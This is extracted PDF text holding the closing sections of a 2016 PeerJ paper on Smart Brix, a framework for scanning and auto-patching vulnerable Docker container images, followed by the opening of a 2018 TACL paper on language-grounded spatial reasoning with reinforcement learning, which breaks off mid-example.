runtime using two instances stems from several factors. On the one hand, we have a certain overhead in terms of management and coordination including the fact that we only deployed one manager and storage asset. On the other hand, a lot of the runtime is caused by the acquisition time, which is clearly bound by network and bandwidth. Since our infrastructure is equipped with just one 100 Mbit uplink that is shared by all cloud resources, this is a clear bottleneck. We also see that the majority of wall clock time is spent for acquisition and that the actual processing time only amounts to Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 15/24 https://peerj.com https://nvd.nist.gov/cvss.cfm http://www.banyanops.com/blog/analyzing-docker-hub/ http://dx.doi.org/10.7717/peerj-cs.66 Figure 7 Comparison of runtime for analytics between one instance and two instances. Table 1 Median and standard deviation for processing time per package over all runs with two in- stances. Set Median processing time Standard deviation processing time No. of packages 250 0.620 s 0.255 s 153,275 500 0.564 s 0.263 s 303,483 1,000 0.537 s 0.252 s 606,721 Overall 0.558 s 0.257 s 1,063,479 approximately 3% of the overall runtime. The fact that the acquisition time for the 1,000 image set does not grow linearly like the runs with the 250 and 500 image set, stems from Docker’s image layer cache. In this case the overall acquisition time grows slower, because a lot of images in the 1,000 set share several layers, which, if already pulled by another analyzer in a previous run, do not need to be pulled again, hence reducing the acquisition time. Finally, we demonstrate that the average processing time of our framework is stable, which is shown in Fig. 8. We further notice a small increase in average processing time for the 250 image set, which is caused by the fact that this set contains more images with larger package numbers compared to the overall amount of images tested, resulting in a slightly higher average processing time. As illustrated in Table 1, per-package processing times remain stable throughout the performed experiments, with a median of 0.558 s and a standard deviation of 0.257 s. Compensation experiments In the the next part of our experiments we focused on the Compensation Facet of our framework. In order to test the ability to automatically handle compensations of vulnerable images, we tested the implemented Container Processor strategy. This strategy compensates found vulnerabilities via automatic upgrades of existing images. It takes Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Figure 8 Comparison of processing time for analytics with two instances. no human intervention, has a very high confidence, keeps all artifacts within the images and is therefore optimal to test the auto-compensation ability of our framework. In the process of compensation the Container Processor generates a new image with the upgraded packages. In order to test this image for improvement we have to store it. This means that for every tested image we have to hold the original image as well as its compensated version. Specifically, we choose to test the most vulnerable images (images with the most vulnerable packages) out of the 1,000 image set we tested that are also the most prominent images in our URBEM scenario. This left us with 150 images, which we split in three sets with 50, 100, and 150 images and started our compensation tests. We then repeated each run to demonstrate repeatability and to balance our results. Since the Compensation Facet follows the same principle as the Analyzer Facet we omitted testing it on one instance and immediately started with two instances. After the tests finished, we compared the newly created images to the original ones and checked if the number of vulnerabilities could be reduced. Overall our experiments showed that from the 150 images we were able to auto- compensate 34 images by reducing the number of vulnerabilities. This illustrates that even a rather simple strategy leads to a significant improvement of around 22.6%, which makes this a very promising approach. In a next step, we compared the overall runtime of our compensation handlers for the three tested sets, and the results are shown in Fig. 9. We again can clearly see that the major amount of time is spent for acquisition, in this case pulling the images that need to be compensated. The compensation itself only takes between 24% and 28% of the overall runtime and shows linear characteristics correlating with the number of images to be compensated. The comparatively low increase in acquisition time for the 150 image set again can be explained with the specific characteristics we see in Docker’s layer handling. In a next step, we compared the average processing time for each set, and the results are shown in Fig. 10. We again notice similar characteristics as we saw with our analyzers. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Figure 9 Comparison of pulltime and processing time for compensation with two instances. Figure 10 Comparison of processing time for compensation with two instances. The average processing time as well as the median processing time are stable. The small increase for the 50 image set is explained with a larger number of images that contain more packages. This fact leads to relatively longer compensation times when upgrading them. DISCUSSION Our experiments showed that our framework is able to scale horizontally. We further demonstrated that the majority of the runtime, both when analyzing and compensating images is caused by the image acquisition, which is bandwidth bound. Given the fact that in most application scenarios of our framework the images will not necessarily reside on Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Docker Hub, but instead in a local registry, this factor greatly relativizes. The processing time itself scales linearly with the number of analyzed packages, and the same was shown for the compensation approach. Furthermore, the processing time in our current evaluation setup is mostly constrained by the prototypical vulnerability checking mechanism and the chosen storage system, which both are not the focus of our contribution. The implementation of different vulnerability checkers, along with more efficient storage and caching of vulnerability data could lead to further reduction in processing time and will be tackled in future work. An additional aspect we did not specifically address in this paper is the fine-grained scale-out of components in all Smart Brix facets. Threats to applicability While the presented framework fulfills the requirements set forth in the previously introduced URBEMproject, certain threatsto the generalapplicability of SmartBrix remain. Currently, the auto-assembly mechanism introduced in ‘Framework rationales’ attempts to eagerly construct analysis and compensation pipelines that are loosely structured along the level of specificity of the performed analysis. Hence, the number of created pipelines can grow exponentially with the number of candidate components in the worst case. If all components for a given level of specificity accept all inputs produced in the previous level, and all subsequent components accept all produced outputs in turn, the number of created pipelines would grow exponentially with the number of components per level of specificity. This problem can be mitigated by introducing a transparent consolidation mechanism that delays the propagation of produced outputs of a certain type for a specified amount of time, orders them by the reported confidence values, and only submits one (or a few) of the produced output values with the highest confidence values for further consumption by other components. Due to the relatively small number of processing components required for the URBEM use case, we left the implementation of this consolidation mechanism for future work. RELATED WORK The rapid adoption of container-based execution environments for modern applications enables increased flexibility and fast-paced evolution. Next to this fast-paced evolution of containers, new containers are deployed whenever functionality has to be added, which leads to massive amounts of containers that need to be maintained. While the container provides an abstraction on top of the operating system, it is still vital that the underlying system complies to policies or regulations to avoid vulnerabilities. However, checking the plethora of available environments and adapting them accordingly, is not a trivial task. Among several approaches stemming from the area of SOA like the works of Lowis & Accorsi (2009), Yu, Aravind & Supthaweesuk (2006) which deal with classic service vulnerabilities as well as the work of Li et al. (2010), Lowis & Accorsi (2011) propose a novel method for analyzing cloud-based services for certain types of vulnerabilities. Next to general models and methods for classifying and analyzing applications, several approaches emerged that allow vulnerability testing. They range from service oriented approaches for penetration and automated black box testing introduced by Bau et al. (2010) and Li Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 et al. (2015) to model based vulnerability testing like the work of Lebeau et al. (2013) as well as automated vulnerability and infrastructure testing methods (e.g., Shahriar & Zulkernine, 2009; Hummer et al., 2013). Antunes & Vieira (2013) introduce SOA-Scanner, an extensible tool for testing service-based environments for vulnerabilities. Based on an iterative approach the tool discovers and monitors existing resources, and automatically applies specific testing approaches. Also, more recently, large scale distributed vulnerability testing approaches have been introduced (e.g., Evans, Benameur & Elder, 2014; Zhang et al., 2014). In contrast to our approach, the aforementioned tools solely concentrate on testing and identifying possible security threats, but do not provide means for adapting the observed application or its environment accordingly. More recently, container-based approaches are applied in the literature to ease development and operation of applications. Tosatto, Ruiu & Attanasio (2015) analyze different cloud orchestration approaches based on containers, discuss ongoing research efforts as well as existing solutions. Furthermore, the authors present a broad variety of challenges and issues that emerge in this context. Wettinger, Breitenbücher & Leymann (2014) present an approach that facilitates container virtualization in order to provide an alternative deployment automation mechanism to convergent approaches that are based on idempotent scripts. By applying action-level compensations, implemented as fine-grained snapshots in the form of containers, the authors showed that this approach is more efficient, more robust, and easier to implement as convergent approaches. However, compared to our approach, the authors do not provide a framework for analyzing container application deployments, which based on identified issues triggers according compensation mechanisms. Gerlach et al. (2014) introduce Skyport, a container-based execution environment for multi-cloud scientific workflows. By employing Docker containers, Skyport is able to address software deployment challenges and deficiencies in resource utilization, which are inherent to existing platforms for executing scientific workflows. In order to show the feasibility of their approach, the authors add Skyport as an extension to an existing platform, and were able to reduce the complexities that arise when providing a suitable execution environment for scientific workflows. In contrast to our approach the authors solely focus on introducing a flexible execution environment, but do not provide a mechanism for continuously evolving container-based deployments. Li, Kanso & Gherbi (2015) present an approach that leverages Linux containers for achieving high availability of cloud applications. The authors present a middleware that is comprised of agents to enable high availability of Linux containers. In addition, application components are encapsulated inside containers, which makes the deployment of components transparent to the application. This allows monitoring and adapting components deployed in containers without modifying the application itself. Although this work shares similarities with our approach, the authors do not provide a framework for testing container-based deployments, which also supports semi-automatic compensation of found issues. Next to scientific approaches, also several industrial platforms emerged that deal with the development and management of container-based applications, with the most prominent being Tutum (https://www.tutum.co) and Tectonic (https://tectonic.com). These cloud-based platforms allow building, deploying and managing dockerized Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 20/24 https://peerj.com https://www.tutum.co https://tectonic.com http://dx.doi.org/10.7717/peerj-cs.66 applications. They are specifically built to make it easy for users to develop and operate the full spectrum of applications, reaching from single container apps, up to distributed microservices stacks. Furthermore, these platforms allow keeping applications secure and up to date, by providing easy patching mechanisms and holistic systems views. In contrast to our approach, these platforms only focus on one specific container technology, and are not extensible. IBM recently introduced the IBM Vulnerability Advisor (https: //developer.ibm.com/bluemix/2015/07/02/vulnerability-advisor/), a tool for discovering possible vulnerabilities and compliance policy problems in IBM containers. While IBM’s approach shares similarities with our work, they are solely focusing on Docker containers that are hosted inside their own Bluemix environment and therefore do not provide a generic approach. Furthermore, their Vulnerability Advisor only provides guidance on how to improve the security of images, but does not support mechanisms to evolve containers. CONCLUSION The numerous benefits of container-based solutions have led to a rapid adoption of this paradigm in recent years. The ability to package application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. However, to enable this flexibility, practitioners need to respect numerous dynamic security and compliance constraints, as well as manage the rapidly growing number of container images. In order to stay on top of this complexity it is essential to provide means to evolve these containers accordingly. In this paper we presented Smart Brix, a framework enabling continuous evolution of container application deployments. We described the URBEM scenario as a case study in the smart city context and provided a comprehensive description of its requirements in terms of container evolution. We introduced Smart Brix to address these requirements, described its architecture, and the proof of concept implementation. Smart Brix supports both, traditional continuous integration processes such as integration tests, as well as custom, business-relevant processes, e.g., to implement security, compliance, or other regulatory checks. Furthermore, Smart Brix not only enables the initial management of application container deployments, but is also designed to continuously monitor the complete application deployment topology and allows for timely reaction to changes (e.g., discovered application vulnerabilities). This is achieved using analytics and compensation pipelines that will autonomously detect and mitigate problems if possible, but are also designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. We evaluated our framework using a representative case study that clearly showed that the framework is feasible and that we could provide an effective and efficient approach for container evolution. As part of our ongoing and future work, we will extend the presented framework to incorporate more sophisticated checking and compensation mechanisms. We will integrate mechanisms from machine learning, specifically focusing on unsupervised learning techniques as a potential vector to advance the framework with autonomous capabilities. We also aim to integrate the Smart Brix framework with our work on IoT cloud applications (Inzinger et al., 2014; Vögler et al., 2015b; Vögler et al., 2015a). Furthermore, we Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 21/24 https://peerj.com https://developer.ibm.com/bluemix/2015/07/02/vulnerability-advisor/ https://developer.ibm.com/bluemix/2015/07/02/vulnerability-advisor/ http://dx.doi.org/10.7717/peerj-cs.66 plan to conduct a large-scale feasibility study of our framework in heterogenous container application deployments. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research leading to these results has received funding from the URBEM doctoral college. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: URBEM. Competing Interests Schahram Dustdar is an Academic Editor for PeerJ. Author Contributions • Johannes M. Schleicher conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Michael Vögler and Christian Inzinger conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Schahram Dustdar wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: (1) Source Code Repository for the Prototype Implementation: https://bitbucket.org/ jomis/smartbrix/ (2) The evaluation results: https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_ evaluation_results.zip. REFERENCES Antunes N, Vieira M. 2013. SOA-Scanner: an integrated tool to detect vulnerabilities in service-based infrastructures. In: Proceedings of the international conference on services computing. Piscataway: IEEE, 280–287. Bau J, Bursztein E, Gupta D, Mitchell J. 2010. State of the art: automated black-box web application vulnerability testing. In: Proceedings of the symposium on security and privacy. Piscataway: IEEE, 332–345. Evans NS, Benameur A, Elder M. 2014. Large-scale evaluation of a vulnerability analysis framework. In: 7th Workshop on Cyber Security Experimentation and Test (CSET 14). Available at http://nsl.cs.columbia.edu/projects/minestrone/papers/cset14-paper- evans.pdf . Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 22/24 https://peerj.com https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/ https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip http://dx.doi.org/10.7717/peerj-cs.66 Gamma E, Helm R, Johnson R, Vlissides J. 1995. Design patterns: elements of reusable object-oriented software. Boston: Addison-Wesley Professional. Gerlach W, Tang W, Keegan K, Harrison T, Wilke A, Bischof J, DSouza M, Devoid S, Murphy-Olson D, Desai N, Meyer F. 2014. Skyport—container-based execution environment management for multi-cloud scientific workflows. In: Proceedings of the international workshop on data-intensive computing in the clouds. Piscataway: IEEE, 25–32. Humble J, Farley D. 2010. Continuous delivery: reliable software releases through build, test, and deployment automation. 1st edition. Boston: Addison-Wesley Professional. Hummer W, Rosenberg F, Oliveira F, Eilam T. 2013. Testing idempotence for infrastructure as code. Lecture notes in computer science, vol. 8275. Berlin Heidelberg: Springer, 368–388. Hüttermann M. 2012. DevOps for developers. New York: Apress. Inzinger C, Nastic S, Sehic S, Vögler M, Li F, Dustdar S. 2014. MADCAT—a methodol- ogy for architecture and deployment of cloud application topologies. In: Proc. Intl. Symp. on service-oriented system engineering. Piscataway: IEEE, 13–22. Lebeau F, Legeard B, Peureux F, Vernotte A. 2013. Model-based vulnerability testing for web applications. In: Proceedings of the international conference on software testing, verification and validation workshops. Piscataway: IEEE, 445–452. Li R, Abendroth D, Lin X, Guo Y, Baek H-W, Eide E, Ricci R, Van der Merwe J. 2015. Potassium: penetration testing as a service. In: Proceedings of the symposium on cloud computing. New York: ACM, 30–42. Li W, Kanso A, Gherbi A. 2015. Leveraging linux containers to achieve high availability for cloud services. In: Proceedings of the international conference on cloud engineering. Piscataway: IEEE, 76–83. Li H-C, Liang P-H, Yang J-M, Chen S-J. 2010. Analysis on cloud-based security vul- nerability assessment. In: Proceedings of the international conference on E-business engineering. Piscataway: IEEE, 490–494. Lowis L, Accorsi R. 2009. On a classification approach for SOA vulnerabilities. In: Proceedings of the international computer software and applications conference. Piscataway: IEEE, 439–444. Lowis L, Accorsi R. 2011. Vulnerability analysis in SOA-based business processes. IEEE Transactions on Services Computing 4(3):230–242 DOI 10.1109/TSC.2010.37. Nelson-Smith S. 2013. Test-driven infrastructure with chef . 2nd edition. North Se- bastopol: O’Reilly Media. Newman S. 2015. Building microservices. North Sebastopol: O’Reilly Media, Inc. Schleicher JM, Vögler M, Inzinger C, Dustdar S. 2015a. Smart fabric-an infrastructure- agnostic artifact topology deployment framework. In: Proceedings of the international conference on mobile services. Piscataway: IEEE, 320–327. Schleicher JM, Vögler M, Inzinger C, Dustdar S. 2015b. Towards the internet of cities: a research roadmap for next-generation smart cities. In: Proceedings of the international workshop on understanding the city with urban informatics. New York: ACM, 3–6. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 23/24 https://peerj.com http://dx.doi.org/10.1109/TSC.2010.37 http://dx.doi.org/10.7717/peerj-cs.66 Schleicher JM, Vögler M, Inzinger C, Hummer W, Dustdar S. 2015c. Nomads— enabling distributed analytical service environments for the smart city domain. In: Proceedings of the international conference on web services. Piscataway: IEEE, 679–685. Shahriar H, Zulkernine M. 2009. Automatic testing of program security vulnerabilities. In: Proceedings of the international computer software and applications conference, vol. 2. Piscataway: IEEE, 550–555. Soltesz S, Pötzl H, Fiuczynski ME, Bavier A, Peterson L. 2007. Container-based oper- ating system virtualization: a scalable, high-performance alternative to hypervisors. SIGOPS Operating Systems Review 41(3):275–287 DOI 10.1145/1272998.1273025. Tosatto A, Ruiu P, Attanasio A. 2015. Container-based orchestration in cloud: state of the art and challenges. In: Proceedings of the international conference on complex, intelligent, and software intensive systems. Piscataway: IEEE, 70–75. Vögler M, Schleicher JM, Inzinger C, Dustdar S. 2015a. Diane—dynamic iot application deployment. In: Proceedings of the international conference on mobile services. Piscataway: IEEE, 298–305. Vögler M, Schleicher JM, Inzinger C, Nastic S, Sehic S, Dustdar S. 2015b. LEONORE— large-scale provisioning of resource-constrained IoT deployments. In: Proceedings of the international symposium on service-oriented system engineering. Piscataway: IEEE, 78–87. Wettinger J, Breitenbücher U, Leymann F. 2014. Compensation-based vs. convergent deployment automation for services operated in the cloud. Lecture Notes in Computer Science 8831:336–350 DOI 10.1007/978-3-662-45391-9_23. Yu W, Aravind D, Supthaweesuk P. 2006. Software vulnerability analysis for web services software systems. In: Proceedings of the symposium on computers and communications. Piscataway: IEEE, 740–748. Zhang D, Liu D, Csallner C, Kung D, Lei Y. 2014. A distributed framework for demand-driven software vulnerability detection. Journal of Systems and Software 87:60–73 DOI 10.1016/j.jss.2013.08.033. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 24/24 https://peerj.com http://dx.doi.org/10.1145/1272998.1273025 http://dx.doi.org/10.1007/978-3-662-45391-9_23 http://dx.doi.org/10.1016/j.jss.2013.08.033 http://dx.doi.org/10.7717/peerj-cs.66 work_ejjref45ynetbnipdfgfc5kmoe ---- Representation Learning for Grounded Spatial Reasoning Michael Janner, Karthik Narasimhan, and Regina Barzilay Computer Science and Artificial Intelligence Laboratory Massachusetts Institute of Technology {janner, karthikn, regina}@csail.mit.edu Abstract The interpretation of spatial references is highly contextual, requiring joint inference over both language and the environment. We consider the task of spatial reasoning in a sim- ulated environment, where an agent can act and receive rewards. The proposed model learns a representation of the world steered by instruction text. This design allows for pre- cise alignment of local neighborhoods with corresponding verbalizations, while also han- dling global references in the instructions. We train our model with reinforcement learning using a variant of generalized value itera- tion. The model outperforms state-of-the-art approaches on several metrics, yielding a 45% reduction in goal localization error.1 1 Introduction Understanding spatial references in natural language is essential for successful human-robot communica- tion and autonomous navigation. This problem is challenging because interpretation of spatial refer- ences is highly context-dependent. For instance, the instruction “Reach the cell above the westernmost rock” translates into different goal locations in the two environments shown in Figure 1. Therefore, to enable generalization to new, unseen worlds, the model must jointly reason over the instruction text and environment configuration. Moreover, the rich- ness and flexibility in verbalizing spatial references further complicates interpretation of such instruc- tions. 1Code and dataset are available at https://github. com/JannerM/spatial-reasoning Reach the cell above the westernmost rock Figure 1: Sample 2D worlds and an instruction de- scribing a goal location. The optimal path from a common start position, denoted by a white dashed line, varies considerably with changes in the map layout. In this paper, we explore the problem of spa- tial reasoning in the context of interactive worlds. Specifically, we assume access to a simulated envi- ronment, in which an agent can take actions to inter- act with the world and is rewarded for reaching the location specified by the language instruction. This feedback is the only source of supervision the model uses for interpreting spatial references. The key modeling task here is to induce a repre- sentation that closely ties environment observations and linguistic expressions. In prior work, this issue was addressed by learning representations for each modality and then combining them, for instance, with concatenation (Misra et al., 2017). While this approach captures high-level correspondences be- tween instructions and maps, it does not encode de- 49 Transactions of the Association for Computational Linguistics, vol. 6, pp. 49–61, 2018. Action Editor: Hal Daumé III. Submission batch: 7/2017; Revision batch: 10/2017; Published 1/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. tailed, lower-level mappings between specific posi- tions on the map and their descriptions. As our ex- periments demonstrate, combining the language and environment representations in a spatially localized manner yields significant performance gains on the task. To this end, our model uses the instruction text to drive the learning of the environment representation. We start by converting the instruction text into a real- valued vector using a recurrent neural network with LSTM cells (Hochreiter and Schmidhuber, 1997). Using this vector as a kernel in a convolution opera- tion, we obtain an instruction-conditioned represen- tation of the state. This allows the model to reason about immediate local neighborhoods in references such as “two cells to the left of the triangle”. We further augment this design to handle global refer- ences that involve information concerning the entire map (e.g. “the westernmost rock”). This is achieved by predicting a global value map using an additional component of the instruction representation. The en- tire model is trained with reinforcement learning us- ing the environmental reward signal as feedback. We conducted our experiments using a 2D virtual world as shown in Figure 1. Overall, we created over 3,300 tasks across 200 maps, with instructions sourced from Mechanical Turk. We compare our model against two state-of-the-art systems adapted for our task (Misra et al., 2017; Schaul et al., 2015). The key findings of our experiments are threefold. First, our model can more precisely interpret instruc- tions than baseline models and find the goal location, yielding a 45% reduction in Manhattan distance er- ror over the closest competitor. Second, the model can robustly generalize across new, unseen map lay- outs. Finally, we demonstrate that factorizing the instruction representation enables the model to sus- tain high performance when handling both local and global references. 2 Related Work Spatial reasoning in text This topic has attracted both theoretical and practical interest. From the lin- guistic and cognitive perspectives, research has fo- cused on the wide range of mechanisms that speak- ers use to express spatial relations (Tenbrink, 2007; Viethen and Dale, 2008; Byrne and Johnson-Laird, 1989; Li and Gleitman, 2002). The practical impli- cations of this research are related to autonomous navigation (Moratz and Tenbrink, 2006; Levit and Roy, 2007; Tellex et al., 2011) and human-robot in- teraction (Skubic et al., 2004). Previous computational approaches include tech- niques such as proximity fields (Kelleher et al., 2006), spatial templates (Levit and Roy, 2007) and geometrically defined mappings (Moratz and Ten- brink, 2006; Kollar et al., 2010). More recent work in robotics has integrated text containing position in- formation with spatial models of the environment to obtain accurate maps for navigation (Walter et al., 2013; Hemachandra et al., 2014). Most of these ap- proaches typically assume access to detailed geome- try or other forms of domain knowledge. In contrast to these knowledge-rich approaches, we are learn- ing spatial reference via interaction with the envi- ronment, acquiring knowledge of the environment in the process. Instruction following Spatial reasoning is a com- mon element in many papers on instruction follow- ing (MacMahon et al., 2006; Vogel and Jurafsky, 2010; Chen and Mooney, 2011; Artzi and Zettle- moyer, 2013; Kim and Mooney, 2013; Andreas and Klein, 2015). As a source of supervision, these methods assume access to demonstrations, which specify the path corresponding with provided in- structions. In our setup, the agent is only driven by the final rewards when the goal is achieved. This weaker source of supervision motivates devel- opment of new techniques not considered in prior work. More recently, Misra et al. (2017) proposed a neural architecture for jointly mapping instructions and visual observations (pixels) to actions in the environment. Their model separately induces text and environment representations, which are concate- nated into a single vector that is used to output an action policy. While this representation captures coarse correspondences between the modalities, it doesn’t encode mappings at the level of local neigh- borhoods, negatively impacting performance on our task. Universal value functions The idea of general- ized value functions has been explored before in Schaul et al. (2015). The technique, termed UVFA, 50 presents a clever trick of factorizing the value func- tion over states and goals using singular value de- composition (SVD) and then learning a regression model to predict the low-rank vectors. This results in quick and effective generalization to all goals in the same state space. However, their work stops short of exploring generalization over map layouts, which our model is designed to handle. Furthermore, our setup also involves specifying goals using natural language instructions, which is different from the coordinate-style specification used in that work. 3 General Framework Task setup We model our task as a Markov Deci- sion Process (MDP), where an autonomous agent is placed in an interactive environment with the capa- bility to choose actions that can affect the world. A goal is described in text, and rewards are available to the agent correspondingly. The MDP can be rep- resented by the tuple 〈S,A,X,T,R〉, where S is the set of all possible state configurations, A is the set of actions available to the agent, X is the set of all goal specifications2 in natural language, T(s′|s,a,x) is the transition distribution, and R(s,x) is the reward function. A state s ∈ S includes information such as the locations of different entities along with the agent’s own position. In this work, T is determin- istic in the environments considered; however, our methods also apply in the stochastic case. Text instructions Prior work has investigated hu- man usage of different types of referring expres- sions to describe spatial relations (Levinson, 2003; Viethen and Dale, 2008). In order to build a ro- bust instruction following system, we examine sev- eral categories of spatial expressions that exhibit the wide range of natural language goal descriptions. Specifically, we consider instructions that utilize ob- jects/entities present in the environment to describe a goal location. These instructions can be catego- rized into three groups: (a) Text referring to a specific entity (e.g., “Go to the circle”). (b) Text specifying a location using a single refer- 2We will use the terms goal specifications and instructions interchangeably. ent entity (e.g., “Reach the cell above the west- ernmost rock”). (c) Text specifying a location using multiple refer- ent entities (e.g., “Move to the goal two squares to the left of the heart and top right of house”). These three categories exemplify an increasing level of complexity, with the last one having multiple lev- els of indirection. In each category, we have both local and global references to objects. Local references require an understanding of spatial prepositional phrases such as ‘above’, ‘in between’ and ‘next to’ in order to de- termine the precise goal location. This comprehen- sion is invariant to the global position of the object landmark(s) provided in the instruction. A global reference, on the other hand, contains superlatives such as ‘easternmost’ and ‘topmost’, which require reasoning over the entire map. For example, in the case of (a) above, a local reference would describe a unique object3 (e.g., “Go to the circle”), whereas a global reference might require comparing the po- sitions of all objects of a specific type (e.g., “Go to the northernmost tree”). A point to note is that we do not assume any ac- cess to mapping from instructions to objects or enti- ties in the worlds or a knowledge of spatial ontology – the system has to learn this entirely through feed- back from the environment. Generalized Value Iteration Learning to reach the goal while maximizing cumulative reward can be done by using a value function V (s) (Sutton and Barto, 1998) which represents the agent’s notion of expected future reward from state s. A popular al- gorithm to learn an optimal value function is Value Iteration (VI) (Bellman, 1957), which uses the tech- nique of dynamic programming. In the standard Bellman equation, the value func- tion is dependent solely on state. Schaul et al. (2015) proposed a value function V (s,g) describing the ex- pected reward from being in state s given goal g, capturing that state values are goal-dependent and that a single environment can offer many such goals. We also make use of such a generalized value func- tion, although our goals are not observed directly as 3A local reference for a non-unique object would be am- biguous, of course. 51 Figure 2: A schematic depiction of our model. Text instructions are represented as a vector h(t) and states as embeddings φ(s). A portion of the text representation is used as a convolutional kernel on φ(s), giving a text-conditioned local state representation z1. The remaining components are used as coefficients in a linear combination of gradient functions to give a global map-level representation z2. z1 and z2 are concatenated and input to a convolutional neural network to predict the final value map. coordinate locations or states themselves but rather described in natural language. With x denoting a textual description of a goal, our VI update equa- tions are: Q(s,a,x) = R(s,x) + γ ∑ s′∈S T(s′|s,a,x)V (s′,x) (1)V (s,x) = max a Q(s,a,x) where Q is the action-value function, tracking the value of choosing action a in state s. Once an opti- mal value function is learned, a straightforward ac- tion policy is: (2)π(s,x) = arg max a Q(s,a,x) 4 Model Generalization over both environment configura- tions and text instructions requires a model that meets two desiderata. First, it must have a flexible representation of goals, one which can encode both the local structure and global spatial attributes inher- ent to natural language instructions. Second, it must be compositional; the representation of language should be generalizable even though each unique in- struction will only be observed with a single map during training. Namely, the learned representation for a given instruction should still be useful even if the objects on a map are rearranged or the layout is changed entirely. To that end, our model combines the textual in- structions with the map in a spatially localized man- ner, as opposed to prior work which joins goal repre- sentations and environment observations via simpler functions like an inner product (Schaul et al., 2015). While our approach can more effectively learn local relations specified by language, it cannot naturally capture descriptions at the global environment level. To address this problem, we also use the language representation to predict coefficients for a basis set of gradient functions which can be combined to en- code global spatial relations. More formally, inputs to our model (see Figure 2) consist of an environment observation s and textual description of a goal x. For simplicity, we will as- sume s to be a 2D matrix, although the model can easily be extended to other input representations. We first convert s to a 3D tensor by projecting each cell to a low-dimensional embedding (φ) as a func- tion of the objects contained in that cell. In parallel, the text instruction x is passed through an LSTM recurrent neural network (Hochreiter and Schmid- huber, 1997) to obtain a continuous vector represen- tation h(x). This vector is then split into local and global components h(x) = [h1(x); h2(x)]. The lo- cal component, h2(x), is reshaped into a kernel to perform a convolution operation on the state embed- ding φ(s) (similar to Chen et al. (2015)): (3)z1 = ψ1(φ(s); h2(x)) Meanwhile, the three-element global component 52 Algorithm 1 Training Procedure 1: Initialize experience memory D 2: Initialize model parameters Θ 3: for epoch=1,M do 4: Sample instruction x∈X and associated environ- ment E 5: Predict value map V̂ (s,x;Θ) for all s∈E 6: Choose start state s0 randomly 7: for t=1,N do 8: Select at=argmax a ∑ s T(s|st−1,a)V̂ (s,x;Θ) 9: Observe next state st and reward rt 10: Store trajectory (s=s0,s1,...,r=r0,r1,...) in D 11: for j=1,J do 12: Sample random trajectory (s,r) from D 13: Perform gradient descent step on loss L(θ) h1(x) is used to form the coefficients for a vertical and horizontal gradient along with a corresponding bias term.4 The gradients, denoted G1 and G2 in Figure 2, are matrices of the same dimensionality as the state observation with values increasing down the rows and along the columns, respectively. The axis-aligned gradients are weighted by the elements of h1(x) and summed to give a final global gradi- ent spanning the entire 2D space, analogous to how steerable filters can be constructed for any orienta- tion using a small set of basis filters (Freeman and Adelson, 1991): (4)z2 = h1(x)[1]·G1 +h1(x)[2]·G2 +h1(x)[3]·J in which J is the all-ones matrix also of the same dimensionality as the observed map. Finally, the local and global information maps are concatenated into a single tensor, which is then pro- cessed by a convolutional neural network (CNN) with parameters θ to approximate the generalized value function: (5)V̂ (s,x) = ψ2([z1; z2]; θ) for every state s in the map. Reinforcement Learning Given our model’s V̂ (s,x) predictions, the resulting policy (Equa- tion 2) can be enacted, giving a continuous trajectory of states {st,st+1, . . .} on a single map and their associated rewards {rt,rt+1, . . .} at each timestep 4Note that we are referring to gradient filters here, not the gradient calculated during backpropagation in deep learning. t. We stored entire trajectories (as opposed to state transition pairs) in a replay memory D as described in Mnih et al. (2015). The model is trained to pro- duce an accurate value estimate by minimizing the following objective: (6) L(Θ) = Es∼D [ V̂ (s,x; Θ) − ( R(s,x) + γ max a ∑ s′ T(s′|s,a)V̂ (s′,x; Θ−) )]2 where s is a state sampled from D, γ is the discount factor, Θ is the set of parameters of the entire model, and Θ− is the set of parameters of a target network copied periodically from our model. The complete training procedure is shown in Algorithm 1. 5 Experimental Setup Puddle world navigation data In order to study generalization across a wide variety of environmen- tal conditions and linguistic inputs, we develop an extension of the puddle world reinforcement learn- ing benchmark (Sutton, 1996; Mankowitz et al., 2016). States in a 10×10 grid are first filled with ei- ther grass or water cells, such that the grass forms one connected component. We then populate the grass region with six unique objects which appear only once per map (triangle, star, diamond, circle, heart, and spade) and four non-unique objects (rock, tree, horse, and house) which can appear any num- ber of times on a given map. See Figure 1 for an example visualization. Split Local Global Train 1566 1071 Test 399 272 Table 1: Overall statistics of our dataset. Goal positions are chosen uniformly at random from the set of grass cells, encouraging the use of spatial references to describe goal locations which do not themselves contain a unique object. We used the Mechanical Turk crowdsourcing plat- form (Buhrmester et al., 2011) to collect natural lan- guage descriptions of these goals. Human annota- tors were asked to describe the positions of these 53 • Reach the horse below the rock and to the left of the green diamond • Move to the square two below and one left of the star • Go to the 